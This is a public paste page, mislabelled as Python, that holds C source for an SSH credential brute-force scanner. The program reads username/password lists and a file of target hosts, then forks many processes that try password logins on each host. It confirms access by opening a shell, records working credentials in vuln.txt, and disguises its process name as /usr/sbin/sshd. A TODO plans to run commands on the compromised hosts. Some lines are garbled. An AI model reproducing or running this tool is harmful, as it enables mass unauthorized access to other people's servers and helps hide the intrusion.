Python 3 5/8/2017

SUBMITTED BY: Guest

DATE: May 8, 2017, 5:52 p.m.

FORMAT: Python

SIZE: 5.3 kB

Raw Download

HITS: 333

Report
  1. If you want more of my pastes visit: https://randompaste.000webhostapp.com/index.html
  2. --------------------------------------------------------------------------------------
  3. view my last post at: https://bitbin.it/XyBO4G4t/
  4. --------------------------------------------------------------------------------------
  6. /*
  7. * by lizard
  8. * some code ripped from haitateam's scanner.
  9. * for daily jobs :)
  10. * Put the user/password in "pass.txt" in the format:
  11. * user1 pass1
  12. * user2 pass2
  13. * user3 pass3
  14. * Cheers.
  15. * some code ripped from haitateam's scannah
  16. * - it fakes the proccesss name in ps list
  17. * - it gets users/password from a list
  18. * - some bugfixes
  19. * - optimized
  20. * TODO:
  21. * - fix some bugs
  22. * - make it to execute commands on the host it hacks.
  23. * thanks go to ncv, for some ideeas for the code.
  24. */
  25. #include <stdio.h>
  26. #include <arpa/inet.h>
  27. #include <libssh.h>
  28. #include <netinet/in.h>
  29. #include <string.h>
  30. #include <sys/socket.h>
  31. #include <sys/types.h>
  32. #include <netdb.h>
  33. #define FAKE "/usr/sbin/sshd" // how do you want it to appear in ps ? :)
  35. int flag,where;
  36. int shell(SSH_SESSION *session){
  37. struct timeval;
  38. int err;
  39. BUFFER *readbuf=buffer_new();
  40. time_t start;
  41. CHANNEL *channel;
  42. channel = open_session_channel(session,1000,1000);
  43. if(isatty(0)) // Check if we got a tty.
  44. err=channel_request_pty(channel); // Request a pty.
  45. err= channel_request_shell(channel); // Request a shell =).
  46. start=time(0); // start teh timer
  47. while (channel>open!=0) // if we dont have a channel open..
  48. {
  49. usleep(500000); // sleep
  50. err=channel_poll(channel,0);
  51. if(err>0){ // do we have a shell ?
  52. err=channel_read(channel,readbuf,0,0); //read teh buffer in the channel
  53. }
  54. else
  55. {
  56. if(start+5<time(0))
  57. {
  58. return 1;
  59. }
  60. }
  61. }
  62. return 0;
  63. }
  64. /* here comes the nice part
  65. * This function checks auth
  66. */
  68. void checkauth(char *user,char *password,char *host) {
  69. struct hostent *hp;struct in_addr *myaddr;
  70. SSH_SESSION *session; // declare some session thingies
  71. SSH_OPTIONS *options;
  72. int argc=1;
  73. char *argv[]={"none"};
  74. FILE *vulnf,*nolog; // file where we log the shizz
  75. where++;
  76. alarm(10);
  77. options=ssh_getopt(&argc,argv);
  78. options_set_username(options,user);
  79. options_set_host(options,host);
  80. session=ssh_connect(options);
  81. if(!session) return ;
  82. if(ssh_userauth_password(session,NULL,password) != SSH_AUTH_SUCCESS) // if no shell, disconnect.
  83. {
  84. ssh_disconnect(session);
  85. return;
  86. }
  87. if(shell(session)) // if we got a session, then we printf() it and log it =>
  88. {
  89. if(!flag){
  90. myaddr=(struct in_addr*)malloc(sizeof(struct in_addr));
  91. myaddr->s_addr=inet_addr(host);
  92. hp = gethostbyaddr((char *) myaddr,4,AF_INET);
  93. if((hp!=NULL)){
  94. vulnf=fopen("vuln.txt","a+");
  95. fprintf(vulnf,"%s:%s %s | %sn",user,password,host,hp->h_name);
  96. printf("n-> %s:%s %s | %sn",user,password,host,hp->h_name);}
  97. else{
  98. vulnf=fopen("vuln.txt","a+");
  99. fprintf(vulnf,"%s:%s %s | host did not resolven",user,password,host);
  100. printf("n-> %s:%s %s | host did not resolven",user,password,host);
  101. }
  102. // flag=1;
  103. fclose(vulnf);
  104. }
  105. }
  106. else{ // if ssh login is denied, printf() && log it
  107. myaddr=(struct in_addr*)malloc(sizeof(struct in_addr));
  108. myaddr->s_addr=inet_addr(host);
  109. hp = gethostbyaddr((char *) myaddr,4,AF_INET);
  110. nolog=fopen("nobash.txt","a+");
  111. if((hp!=NULL)){
  112. fprintf(nolog,"%s %s %s | %sn",user,password,host,hp->h_name);
  113. printf("nnobash -> %s %s %s | %sn",user,password,host,hp->h_name);}
  114. else
  115. {
  116. fprintf(nolog,"%s %s %s | no hostn",user,password,host);
  117. printf("nnobash -> %s %s %s | no hostn",user,password,host);}
  119. fclose(nolog);
  120. }
  121. }
  122. int main(int argc, char **argv)
  123. {
  124. FILE *fp,*passf;
  125. char *c;
  126. char buff[4096];
  127. char *a[80196], nutt[4096], *temp, *t, *string;
  128. malloc(sizeof(a));
  129. malloc(sizeof(nutt));
  130. int count = 0, i;
  131. int numforks,maxf;
  132. if((passf=fopen("pass.txt","r")) == NULL)
  133. { // here we scan the pass file for users and passwords.
  134. printf("FATAL: Cant find pass.txtn");
  135. return -1;
  136. }
  137. while (fgets(nutt,2024,passf))
  138. {
  139. while (t = strchr (nutt,'n'))
  140. *t = '\0';
  141. temp = strtok (nutt, " ");
  142. string = strdup (temp);
  143. a[count++]=string;
  144. while (temp = strtok (NULL, " "))
  145. {
  146. string = strdup (temp);
  147. a[count++]=string;
  148. }
  150. }
  151. fclose(passf);
  153. if(argc!=2)
  154. {
  155. printf("%s <max forks>n",argv[0]);
  156. exit(0);
  157. }
  158. if((fp=fopen("scan.log","r"))==NULL) exit(printf("FATAL: Cannot open scan.logn"));
  160. maxf=atoi(argv[1]);
  162. strcpy(argv[0],FAKE); // fake the proccess name.
  163. while(fgets(buff,sizeof(buff),fp))
  164. {
  165. c=strchr(buff,'n');
  166. if(c!=NULL) *c='\0';
  167. if (!(fork()))
  168. {
  169. where=0;
  170. // printf("Trying to pwn %s",buff);
  171. for (i=0; i<count; i=i+2){
  172. // printf("* Trying %s:%s %sn",a[i],a[i+1],buff);
  173. checkauth(a[i],a[i+1],buff); // try to auth
  174. }
  175. exit(0);
  176. }
  177. else
  178. {
  179. numforks++;
  180. if (numforks > maxf)
  181. for (numforks; numforks > maxf; numforks--)
  182. wait(NULL);
  183. }
  184. }
  185. }
comments powered by Disqus